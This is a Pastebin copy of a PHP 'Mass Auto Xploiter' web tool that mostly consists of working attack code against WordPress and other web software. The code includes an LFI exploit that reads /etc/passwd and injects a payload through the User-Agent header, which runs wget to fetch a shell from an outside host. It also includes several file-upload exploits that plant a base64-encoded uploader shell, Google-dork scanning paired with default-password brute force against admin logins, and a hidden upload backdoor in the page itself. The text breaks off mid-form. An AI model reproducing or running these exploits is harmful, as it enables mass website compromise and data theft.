Ribang

Mini Mass Auto Xploiter Only Tools v1.0

Feb 1st, 2018
650
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 45.04 KB | None | 0 0
  1. <!DOCTYPE html><html><head><meta charset="UTF-8">
  2. <title>Mini Mass Auto Xploiter Only Tools v1.0</title>
  3. <?php
  4. /// This is Juste a [Zip] Off Tools Don't Change Right Noob
  5.  
  6. /// Mass Auto Xploiter Only Tools v1.014 Tool
  7. /// Created By Mister Klio
  8. /// Mail : Mister-klio@hotmail.com
  9. /// Fb : www.fb.com/IzzAdiine
  10.  
  11. ?>
  12. <style>
  13. @import url(https://fonts.googleapis.com/css?family=Berlin%20Sans%20FB);
  14. body {
  15. font-family: 'Berlin Sans FB', Arial, sans-serif;
  16. background: #383838;color: white;
  17. font-size:15px;}span {color: #404040;font-size:15px;
  18. }
  19. span,b,font,a {
  20. font-size:15px;
  21. }
  22. .header-izz {
  23. -webkit-box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.2), 0 0 6px rgba(0, 0, 0, 0.4);
  24. box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.2), 0 0 6px rgba(0, 0, 0, 0.4);
  25. margin: 20px 0;
  26. background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));
  27. background:-webkit-linear-gradient(top, #505050, #383838);
  28. background:linear-gradient(to bottom, #505050, #383838);
  29. background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;
  30. width: 400px;position: relative;border-radius: 20px;padding: 20px;color: white;
  31. }
  32. .button {
  33. background: #0078FF; color: white; text-align: center; padding: 12px; text-decoration: none;
  34. border-radius: 1px; border-radius:5px;margin:0 auto; border:1px solid #4D4D4D;
  35. }
  36. input {margin: 0;
  37. -webkit-box-sizing: border-box;width:90%;
  38. }
  39. .checkout-input {
  40. font-family: 'Berlin Sans FB', Arial, sans-serif;
  41. margin: 0;
  42. padding:2px;
  43. height: 32px;
  44. width:90%;
  45. color: #FFFFFF;
  46. background: #383838;
  47. border :0px;
  48. border-radius:5px;
  49. -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 1px rgba(255, 255, 255, 0.5);
  50. box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 1px rgba(255, 255, 255, 0.5);
  51. }
  52.  
  53. a {text-decoration:none; font-family: 'Berlin Sans FB', Arial, sans-serif;color:#FFFFFF;}
  54. a:hover {text-decoration:none;color:#fffffff;background:#0078FF;
  55. }
  56. .Izz {
  57. background: #0078FF;
  58. border-radius: 20px;
  59. padding: 10px;
  60. }
  61. </style>
  62. <?
  63. /// Hide Really File Upload
  64. if ($_GET['Hide'] == 'Upload') {
  65. echo "<center><a Style='font-size:30px;'><br>
  66. Upload Files </a></center><center><center><form method='post' enctype='multipart/form-data' >
  67. <input type='file' name='idx'><input type='submit' name='upload' value='upload' class='button'>
  68. </form>";
  69. if($_POST['upload']) {
  70. if(@copy($_FILES['idx']['tmp_name'], $_FILES['idx']['name'])) {
  71. echo "Done!";
  72. } else {
  73. echo "Sorry Mama No !";
  74. }
  75. }
  76. exit;
  77. }
  78. ?>
  79. <center>
  80. <?php
  81. //// Thsi Script Juste For Fun :v
  82. echo "<center><form action=' ' method='post' enctype='multipart/form-data' >
  83. <input type='file' ><input type='submit' name='Done' value='upload' class='button'>
  84. </form>";
  85. $Done = $_POST ['Done'];
  86. if ($Done){
  87. echo '<br> Fuck You Noob Are You A Really Hacker ??? Fuck Kill me<br>';
  88. }
  89. ?></center>
  90. <br><center><a Style='font-size:30px;'>Mass Auto Xploiter Only Tools v1.0</b></center>
  91. <center><a Style='font-size:15px;'>Created By Mister Klio [MK] </a></center>
  92. <center><a Style='font-size:15px;'>www.Facebook.com/MrKlio </a></center>
  93. <? echo "".php_uname()."<br>"; ?>
  94. <center><a Style='font-size:15px;'>Copyright 2017 All Right Reserved </a></center>
  95. <?
  96. //// Mister klio Only Tools v1.0
  97. ?>
  98. <br><br>
  99. <center>
  100. <a class='Izz' href='?Home=Done!' style='background:#2270ff;'>Home (Hide My Tools)</a>
  101. <a class='Izz' href='?Scanexploit=Done!' style='background:#2270ff;'>Cms Scanner Vuln Online</a>
  102. <a class='Izz' href='?Aksidownload=Done!' style='background:#2270ff;'>Auto Dorker Auto Upload Shell (Aksi download)</a>
  103. <a class='Izz' href='?adminweb=Done!' style='background:#2270ff;'>Admin Auto Get Login (Ajax Google Dorker)</a>
  104. <? ////// ?><br><br><br>
  105. <a class='Izz' href='?Udesign=Done!' style='background:#2270ff;'>Wp Theme U-design (Uploadify</a>
  106. <a class='Izz' href='?single-upload=Done!' style='background:#2270ff;'>Wp Plugins tevolution (Single Upload)</a>
  107. <a class='Izz' href='?Upload=Done!' style='background:#2270ff;'>Xploit Upload Files (All Url Vuln)</a>
  108. <a class='Izz' href='?uploadimages=Done!' style='background:#2270ff;'>Modules Upload Files (uploadimages)</a>
  109. <? ////// ?><br><br><br>
  110. <a class='Izz' href='?download=Done!' style='background:#2270ff;'>Wp Auto Get Db (LFI) </a>
  111. <a class='Izz' href='?forcedownload=Done!' style='background:#2270ff;'>WP Get Database [Forcedownload]</a>
  112. <a class='Izz' href='?mail-masta=Done!' style='background:#2270ff;'> 1 - Wordpress Auto Get DataBase (AFD)</a>
  113. <a class='Izz' href='?PluginMail=Done!' style='background:#2270ff;'> 2 - WordPress Plugin Mailmasta (LFI)</a>
  114. <? ////// ?><br><br><br>
  115. <a class='Izz' href='?jqueryDownload=Done!' style='background:#2270ff;'>Jquery File Upload (uploader )</a>
  116. <a class='Izz' href='?CatproManage=Done!' style='background:#2270ff;'>Wordpress Catpro Gallery (AFU)</a>
  117. <a class='Izz' href='?Finder=Done!' style='background:#2270ff;'>Finder Admin V2.0</a>
  118. <? ////// ?>
  119.  
  120. <? ////// ?><br><br>
  121.  
  122. <?php
  123. if ($_GET['Scanexploit'] == 'Done!') {
  124. ?>
  125. <?php
  126.  
  127. @set_time_limit(0);
  128. @error_reporting(0);
  129.  
  130. // Script Functions , start ..!
  131.  
  132. function ask_exploit_db($component){
  133.  
  134. $exploitdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
  135.  
  136. $result = @file_get_contents($exploitdb);
  137.  
  138. if (eregi("No results",$result)) {
  139.  
  140. echo"<td>Not Found</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>";
  141.  
  142. }else{
  143.  
  144. echo"<td><a href='$exploitdb'>Found ..!</a></td><td><--</td></tr>";
  145.  
  146. }
  147. }
  148.  
  149. /**************************************************************/
  150. /* Joomla Conf */
  151.  
  152. function get_components($site){
  153.  
  154. $source = @file_get_contents($site);
  155.  
  156. preg_match_all('{option,(.*?)/}i',$source,$f);
  157. preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
  158. preg_match_all('{/components/(.*?)/}i',$source,$f3);
  159.  
  160. $arz=array_merge($f2[1],$f[1],$f3[1]);
  161.  
  162. $coms=array();
  163.  
  164. if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
  165.  
  166. foreach(array_unique($arz) as $x){
  167.  
  168. $coms[]=$x;
  169. }
  170.  
  171. foreach($coms as $comm){
  172.  
  173. echo "<tr><td>$comm</td>";
  174.  
  175. ask_exploit_db($comm);
  176.  
  177. }
  178.  
  179. }
  180.  
  181. /**************************************************************/
  182. /* WP Conf */
  183.  
  184. function get_plugins($site){
  185.  
  186. $source = @file_get_contents($site);
  187.  
  188. preg_match_all("#/plugins/(.*?)/#i", $source, $f);
  189.  
  190. $plugins=array_unique($f[1]);
  191.  
  192. if(count($plugins)==0){ echo "<tr><td colspan=1>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
  193.  
  194. foreach($plugins as $plugin){
  195.  
  196. echo "<tr><td>$plugin</td>";
  197.  
  198. ask_exploit_db($plugin);
  199.  
  200. }
  201.  
  202. }
  203.  
  204. /**************************************************************/
  205. /* Nuke's Conf */
  206.  
  207. function get_numod($site){
  208.  
  209. $source = @file_get_contents($site);
  210.  
  211. preg_match_all('{?name=(.*?)/}i',$source,$f);
  212. preg_match_all('{?name=(.*?)(&amp;|&|l_op=")}i',$source,$f2);
  213. preg_match_all('{/modules/(.*?)/}i',$source,$f3);
  214.  
  215. $arz=array_merge($f2[1],$f[1],$f3[1]);
  216.  
  217. $coms=array();
  218.  
  219. if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
  220.  
  221. foreach(array_unique($arz) as $x){
  222.  
  223. $coms[]=$x;
  224. }
  225.  
  226. foreach($coms as $nmod){
  227.  
  228. echo "<tr><td>$nmod</td>";
  229.  
  230. ask_exploit_db($nmod);
  231.  
  232. }
  233.  
  234. }
  235.  
  236. /*****************************************************/
  237. /* Xoops Conf */
  238.  
  239. function get_xoomod($site){
  240.  
  241. $source = @file_get_contents($site);
  242.  
  243. preg_match_all('{/modules/(.*?)/}i',$source,$f);
  244.  
  245. $arz=array_merge($f[1]);
  246.  
  247. $coms=array();
  248.  
  249. if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
  250.  
  251. foreach(array_unique($arz) as $x){
  252.  
  253. $coms[]=$x;
  254. }
  255.  
  256. foreach($coms as $xmod){
  257.  
  258. echo "<tr><td>$xmod</td>";
  259.  
  260. ask_exploit_db($xmod);
  261.  
  262. }
  263.  
  264. }
  265.  
  266. /**************************************************************/
  267. /* Header */
  268. function t_header($site){
  269.  
  270. ?>
  271.  
  272. <?
  273. echo'<table align="center" border="1" width="50%" cellspacing="1" cellpadding="5">';
  274.  
  275. echo'
  276. <tr>
  277. <td>Site : <a href="'.$site.'">'.$site.'</a></td>
  278. <td>Exploit-db</b></td>
  279. <td>Exploit it !</td>
  280. </tr>
  281. ';
  282.  
  283. }
  284.  
  285. ?>
  286. <center><a Style='font-size:30px;'><br>
  287. Cms Scanner Vuln Online</a></center><center>
  288. <br>
  289. <form method="POST" action="" class='header-izz'>
  290. <p align="center"><input type="text" name="site" value="http://www.target.mu/" class='checkout-input'>
  291. <br><br>
  292. <select name="what">
  293. <option>Wordpress</option>
  294. <option>Joomla</option>
  295. <option>Nuke's</option>
  296. <option>Xoops</option>
  297.  
  298. </select><br><br><input type="submit" value="Get Xploit" class='button'></p>
  299. </form>
  300. <?
  301.  
  302. // Start Scan :P :P ...
  303.  
  304. if($_POST){
  305.  
  306. $site=strip_tags(trim($_POST['site']));
  307.  
  308. t_header($site);
  309.  
  310. echo $x01 = ($_POST['what']=="Wordpress") ? get_plugins($site):"";
  311. echo $x02 = ($_POST['what']=="Joomla") ? get_components($site):"";
  312. echo $x03 = ($_POST['what']=="Nuke's") ? get_numod($site):"";
  313. echo $x04 = ($_POST['what']=="Xoops") ? get_xoomod($site):"";
  314.  
  315. }
  316. exit;
  317. }
  318. ?>
  319. </table>
  320. <?php
  321. if ($_GET['PluginMail'] == 'Done!') {
  322. ?>
  323. <br><center><a Style='font-size:30px;'>
  324. WordPress Plugin Mailmasta (LFI)</a></center><center>
  325. <br>
  326. Dork : /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php <br>
  327. Dork : /plugins/mail-masta/inc/campaign/ <br>
  328. <form method='post' class='header-izz'>
  329. Target:<br><br> <input type="text" size="60" name="lfiurl" value="http://target.com" style='width: 350px;' class='checkout-input'> <br><br>
  330. <input type="submit" value="Done!" class='button'>
  331. </form>
  332. <?php
  333. if($_POST['lfiurl']) {
  334. print "<pre>";
  335. $target = $_POST['lfiurl'];
  336. $testlfi = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd%00";
  337. $readenv = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/proc/self/environ%00";
  338. $mbooh = preg_split("/.php/", $target);
  339. $pecah = preg_split("/\//", $mbooh[0]);
  340. $path = "/";
  341. $azz = count($pecah) - 1;
  342. for($g = 3; $g<$azz;$g++) {
  343. $path.= $pecah[$g]."/";
  344. }
  345. $bug = $pecah[$azz].".php".$mbooh[1];
  346. $host = $pecah[2];
  347. print "[+] Testing LFI ... ";
  348. flush();
  349. $res = FetchURL($target.$testlfi);
  350. if(preg_match("/root:x:0:0/", $res)) {
  351. print "<font color='green'>Ok</font><br>[+] Reading /proc/self/environ ... ";
  352. flush();
  353. $rez = FetchURL($target.$readenv);
  354. if(preg_match("/DOCUMENT_ROOT=/", $rez)) {
  355. print "<font color='green'>Ok</font><br>[+] Exploiting target ... <br>";
  356. flush();
  357. $cmd = "<?php system('wget -O up.php www.wget.yu.tl/files/uploader.css');?>";
  358. $soket = fsockopen($host, 80);
  359. $req = "GET ".$path.$bug.$readenv." HTTP/1.0\r\nHost: ".$host."\r\nAccept: */*\r\nUser-Agent: ".$cmd."\r\n\r\n";
  360. fputs($soket, $req);
  361. fclose($soket);
  362. flush();
  363. $cek = FetchURL("http://".$host.$path."up.php");
  364. if(preg_match("#SilverHood#i", $cek)) {
  365. print "[+] Exploit successful!<br>[+] Shell uploader to <font color='green'>http://".$host.$path."up.php</font>";
  366. } else {
  367. print "<font color='red'>[!] Exploit failed!</font><br>";
  368. }
  369. }
  370. else {
  371. print "<font color='red'>Failed</font><br>";
  372. }
  373. } else {
  374. print "<font color='red'>Failed</font><br>";
  375. }
  376. }
  377. function FetchURL($url) {
  378. $ch = curl_init();
  379. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)");
  380. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  381. curl_setopt($ch, CURLOPT_HEADER, 1);
  382. curl_setopt($ch, CURLOPT_URL, $url);
  383. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  384. curl_setopt($ch, CURLOPT_TIMEOUT, 30);
  385. $data = curl_exec($ch);
  386. if(!$data) {
  387. return false;
  388. }
  389. return $data;
  390. }
  391. exit;
  392. }
  393. ?>
  394. <?
  395. if ($_GET['CatproManage'] == 'Done!') {
  396. ?>
  397. <?php
  398. @session_start();
  399. @error_reporting(0);
  400. @ini_set('error_log',NULL);
  401. @ini_set('log_errors',0);
  402. @ini_set('display_errors', 0);
  403. @set_time_limit(0);
  404. /*
  405. Name app : Wordpress Catpro Gallery (AFU)
  406. Author / Editor Script : MKs CYBERSERKERS
  407. Email : cyberserkers@gmail.com
  408. */
  409.  
  410. ?><br><center><a Style='font-size:30px;color:#ededed;'>Wordpress Catpro Gallery (AFU)</a></center><center>
  411. Dork : /wp-admin/admin.php?page=catpro_manage <br>
  412. <form method='post' class='header-izz'>
  413. Domain: <br>Mk.php.xxxjpg<br><br>
  414. <textarea placeholder='http://www.target.com/' name='url' style='width: 350px;' class='checkout-input'></textarea><br><br>
  415. <input type='submit' name='MK' value='Done!' class='button'>
  416. </form>
  417.  
  418. <?php
  419. $site = $_POST['url'];
  420. if($_POST['MK']) {
  421. echo "<br> Target : ".$site."<br>";
  422. $post = array(
  423. "task" => "cpr_add_new_album",
  424. "album_name" => "MKs",
  425. "album_desc" => "MKs",
  426. "album_img" => "@Mk.php.xxxjpg",
  427. );
  428. $ch = curl_init ("$site/wp-admin/admin.php?page=catpro_manage");
  429. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  430. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  431. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  432. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
  433. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  434. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  435. curl_setopt ($ch, CURLOPT_POST, 1);
  436. @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  437. $data = curl_exec ($ch);
  438. curl_close ($ch);
  439. }
  440. exit;
  441. }
  442. ?>
  443. <?
  444. if ($_GET['jqueryDownload'] == 'Done!') {
  445. ?>
  446. <br><center><a Style='font-size:30px;color:#ededed;'>Jquery File Upload (uploader )</a></center><center>
  447. Dork : /assets/global/plugins/jquery-file-upload/server/php/ <br>
  448. <form method="post" action="" enctype="multipart/form-data" class='header-izz'>
  449. Name Shell Upload : <br><br><input type="text" name="go" value="Mk.php.xxxjpg" style='width: 350px;' class='checkout-input'><br><br>
  450. Target :<br><br>
  451. <textarea placeholder="http://www.target.com/" name="sites" style='width: 350px;' class='checkout-input'></textarea><br><br>
  452. <input type="submit" name="go" value="Xploit!" class='button'>
  453. </form>
  454. <?php
  455. $site = explode("\r\n", $_POST['sites']);
  456. $go = $_POST['go'];
  457. if($go) {
  458. foreach($site as $sites) {
  459.  
  460. $uploader = 'Mk.php.xxxjpg';
  461.  
  462. $ch = curl_init("{$sites}/assets/global/plugins/jquery-file-upload/server/php/");
  463. curl_setopt($ch, CURLOPT_POST, 1);
  464. curl_setopt($ch, CURLOPT_POSTFIELDS,
  465. array('files[]'=>"@$uploader"));
  466. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  467. $postResult = curl_exec($ch);
  468. curl_close($ch);
  469. if(preg_match("/url|deleteUrl|deleteType/", $postResult)) {
  470. preg_match('/"url":"(.*?)"/', $postResult, $get);
  471. $loc = $get[1];
  472. echo "URL : <font color=green>$sites</font><br>";
  473. echo "Status : Successfully Xploited!<br>";
  474. echo "File : <a href='$loc' target='_blank'><font color=green>$loc</font></a><br>";
  475. }else {
  476. echo 'Not Upload';
  477. }
  478. }
  479. }
  480. exit;
  481. }
  482. ?>
  483. <?
  484. if ($_GET['Aksidownload'] == 'Done!') {
  485. ?>
  486. <br><center><a Style='font-size:30px;color:#ededed;'>Auto Dorker Auto Upload Shell (Aksi download)</a></center><center>
  487. Dork : /adminweb/modul/mod_download/aksi_download.php <br>
  488. <form method="post" class='header-izz'>
  489. <form method="post">
  490. Dork: <br><br><input type="text" name="dork" value="inurl:/semua-berita.html" size="50" style='width: 350px;' class='checkout-input'><br><br>
  491. <input type="submit" value="scan" class='button'>
  492. </form>
  493. <?php
  494.  
  495. class MK {
  496. public $dork;
  497. public function google($dork, $page) {
  498. $kunAPI = "AIzaSyDYG1FME1N7meBZLcywY7VojMHmtUAUIzY";
  499. $dork = urlencode($dork);
  500. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz=8&q={$dork}&key=$kunAPI&start={$page}";
  501. $output = json_decode($this->http_getx($url, true), true);
  502. if($output) {
  503. return $output;
  504. } else {
  505. return false;
  506. }
  507. }
  508. public function http_getx($url, $safemode = false) {
  509. if($safemode === true) sleep(1);
  510. $im = curl_init($url);
  511. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  512. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  513. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  514. curl_setopt($im, CURLOPT_HEADER, 0);
  515. return curl_exec($im);
  516. curl_close();
  517. }
  518. public function buffer() {
  519. ob_flush();
  520. flush();
  521. }
  522. public function exploit($url,$payload) {
  523. $ch = curl_init($url);
  524. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  525. curl_setopt($ch, CURLOPT_POST, true);
  526. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  527. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  528. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  529. curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  530. $res = curl_exec($ch);
  531. curl_close($ch);
  532. return $res;
  533. }
  534. }
  535. $dorker = new MK;
  536. $dork = $dorker->dork = $_POST['dork'];
  537. if(isset($dork)) {
  538. $data = $dorker->google($dork, "0");
  539. $dorker->buffer();
  540. if($data) {
  541. foreach($data['responseData']['cursor']['pages'] as $key => $data_page) {
  542. $data = $dorker->google($dork, $data_page['start']);
  543. foreach($data['responseData']['results'] as $key => $load_data) {
  544. if($_SESSION[$load_data['visibleUrl']]) {
  545. } else {
  546. $_SESSION[$load_data['visibleUrl']] = "1";
  547. $url = "http://".$load_data['visibleUrl']."/";
  548. $up = array(
  549. "admin" => "admin",
  550. "admin" => "123456",
  551. "admin" => "admin123456",
  552. "admin" => "tolol",
  553. "admin" => "administrator",
  554. "MK" => "MK",
  555. );
  556. foreach($up as $user => $pass) {
  557. $data1 = array("username" => $user, "password" => $pass,);
  558. $anu = $dorker->exploit($url.'/adminweb/cek_login.php', $data1);
  559. if(preg_match("/Logout|Administrator/i", $anu)) {
  560. $file = "shellmu.php"; // ubah shellmu.php jadi nama file shellmu 1 dir dengan exploit ini
  561. $data2 = array("judul" => "MK", "fupload" => "@$file", "upload" => " &nbsp;&nbsp;&nbsp;&nbsp; Simpan &nbsp;&nbsp;&nbsp;&nbsp;");
  562. $anu2 = $dorker->exploit($url.'/adminweb/modul/mod_download/aksi_download.php?module=download&act=input', $data2);
  563. if(preg_match("/MK/", $anu2)) {
  564. $cek = $dorker->http_getx("$url/files/shellmu.php");
  565. if(preg_match("/Upload|MySQL|SMTP Grabber/i", $cek)) {
  566. echo "<a href='$url/files/shellmu.php' target='_blank'>$url/files/shellmu.php</a><br>";
  567. }
  568. }
  569. }
  570. }
  571. $dorker->buffer();
  572. }
  573. }
  574. }
  575. $dorker->buffer();
  576. } else {
  577. echo "google captcha.";
  578. }
  579. }
  580. exit;
  581. }
  582. ?>
  583. <?
  584. if ($_GET['adminweb'] == 'Done!') {
  585. ?>
  586. <br><center><a Style='font-size:30px;color:#ededed;'>Admin Auto Get Login (Ajax Google Dorker)</a></center><center>
  587. Dork : inurl:/semua-berita.html <br>
  588. <form method="post" class='header-izz'>
  589. Dork : <br><br><input type="text" name="dork" value="inurl:/semua-berita.html" size="50" style='width: 350px;' class='checkout-input'><br><br>
  590. <input type="submit" value="scan" class='button'>
  591. </form>
  592. <?php
  593. class MK {
  594. public $dork;
  595. public function google($dork, $page) {
  596. $kunAPI = "AIzaSyDYG1FME1N7meBZLcywY7VojMHmtUAUIzY";
  597. $dork = urlencode($dork);
  598. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz=8&q={$dork}&key=$kunAPI&start={$page}";
  599. $output = json_decode($this->http_getx($url, true), true);
  600. if($output) {
  601. return $output;
  602. } else {
  603. return false;
  604. }
  605. }
  606. public function http_getx($url, $safemode = false) {
  607. if($safemode === true) sleep(1);
  608. $im = curl_init($url);
  609. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  610. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  611. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  612. curl_setopt($im, CURLOPT_HEADER, 0);
  613. return curl_exec($im);
  614. curl_close();
  615. }
  616. public function buffer() {
  617. ob_flush();
  618. flush();
  619. }
  620. public function exploit($url,$payload) {
  621. $ch = curl_init($url);
  622. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  623. curl_setopt($ch, CURLOPT_POST, true);
  624. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  625. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  626. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  627. curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  628. $res = curl_exec($ch);
  629. curl_close($ch);
  630. return $res;
  631. }
  632. }
  633. $dorker = new MK;
  634. $dork = $dorker->dork = $_POST['dork'];
  635. if(isset($dork)) {
  636. $data = $dorker->google($dork, "0");
  637. $dorker->buffer();
  638. if($data) {
  639. foreach($data['responseData']['cursor']['pages'] as $key => $data_page) {
  640. $data = $dorker->google($dork, $data_page['start']);
  641. foreach($data['responseData']['results'] as $key => $load_data) {
  642. if($_SESSION[$load_data['visibleUrl']]) {
  643. } else {
  644. $_SESSION[$load_data['visibleUrl']] = "1";
  645. $url = "http://".$load_data['visibleUrl']."/";
  646. $up = array(
  647. "admin" => "admin",
  648. "MK" => "MK",
  649. "admin" => "123456",
  650. "admin" => "admin123456",
  651. "admin" => "tolol",
  652. "admin" => "administrator",
  653. );
  654. foreach($up as $user => $pass) {
  655. if($_SESSION[$user] && $_SESSION[$pass]) {
  656. } else {
  657. $_SESSION[$user] = "1";
  658. $_SESSION[$pass] = "1";
  659. $data = array(
  660. "username" => $user,
  661. "password" => $pass,
  662. "Submt" => "Submit",
  663. );
  664. $anu = $dorker->exploit($url.'/adminweb/cek_login.php', $data);
  665. if(preg_match("/Logout|Selamat Datang di Halaman Administrator/i", $anu)) {
  666. echo "<a href='$url/adminweb/' target='_blank'>$url</a> -> sukses login [$user:$pass]<br>";
  667. } else {
  668. echo "$url -> gagal login.<br>";
  669. }
  670. }
  671. $dorker->buffer();
  672. }
  673. }
  674. }
  675. }
  676. $dorker->buffer();
  677. } else {
  678. echo "google captcha.";
  679. }
  680. }
  681. exit;
  682. }
  683. ?>
  684. <?
  685. if ($_GET['Udesign'] == 'Done!') {
  686. ?>
  687. <br><center><a Style='font-size:30px;color:#ededed;'> Wp Theme U-design (Uploadify)</a></center><center>
  688. Dork : /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php <br>
  689. <center>
  690. <form method="post" enctype="multipart/form-data" class='header-izz'>
  691. Shellname : <br><br><input type="text" name='filename' value='Mk.php.xxxjpg' style='width: 350px; height:20px;' class='checkout-input'><br>
  692. Target: <br><br><textarea name="url" placeholder="http://www.target.com/" style='width: 350px; height:50px;' class='checkout-input'></textarea><br><br>
  693. <input type='submit' name='exp' value='Done!' class='button'>
  694. </form>
  695. <?php
  696.  
  697. set_time_limit(0);
  698. error_reporting(0);
  699.  
  700. function buffer() {
  701. ob_flush();
  702. flush();
  703. }
  704. function curl($url, $payload) {
  705. $ch = curl_init();
  706. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  707. curl_setopt($ch, CURLOPT_URL, $url);
  708. curl_setopt($ch, CURLOPT_POST, true);
  709. curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  710. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  711. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  712. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  713. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  714. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  715. curl_setopt($ch, CURLOPT_HEADER, 0);
  716. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  717. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  718. $res = curl_exec($ch);
  719. curl_close($ch);
  720. return $res;
  721. }
  722. function cek($url) {
  723. $ch = curl_init();
  724. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  725. curl_setopt($ch, CURLOPT_URL, $url);
  726. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  727. $res = curl_exec($ch);
  728. curl_close($ch);
  729. return $res;
  730. }
  731. $file = htmlspecialchars($_POST['filename']);
  732. $site = explode("\r\n", $_POST['url']);
  733. $do = $_POST['exp'];
  734. $uploader = base64_decode("PD9waHANCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
  735. if($do) {
  736. $idx_dir = mkdir("Mk_only", 0755);
  737. $shell = "Mk_only/".$file;
  738. $fopen = fopen($shell, "w");
  739. fwrite($fopen, $uploader);
  740. fclose($fopen);
  741. foreach($site as $url) {
  742. $target = $url.'/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php';
  743. $data = array(
  744. "Filedata" => "@$shell"
  745. );
  746. $curl = curl($target, $data);
  747. if($curl) {
  748. $cek = cek($url.'/'.$file);
  749. if(preg_match("/MK/i", $cek)) {
  750. echo "<a href='$url/$file' target='_blank'>$url/$file</a> -> shellmu<br>";
  751. }
  752. }
  753. buffer();
  754. }
  755. }
  756. exit;
  757. }
  758. ?>
  759. <?
  760. if ($_GET['single-upload'] == 'Done!') {
  761. ?>
  762. <br><center><a Style='font-size:30px;color:#ededed;'> Wp Plugins tevolution (Single Upload)</a></center><center>
  763. Dork : /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php <br>
  764. <center>
  765. <form method="post" enctype="multipart/form-data" class='header-izz'>
  766. Shellname Mk.php.xxxjpg : <br><br><input type="text" name='filename' value='Mk.php.xxxjpg' required style='width: 350px; height:20px;' class='checkout-input'><br>
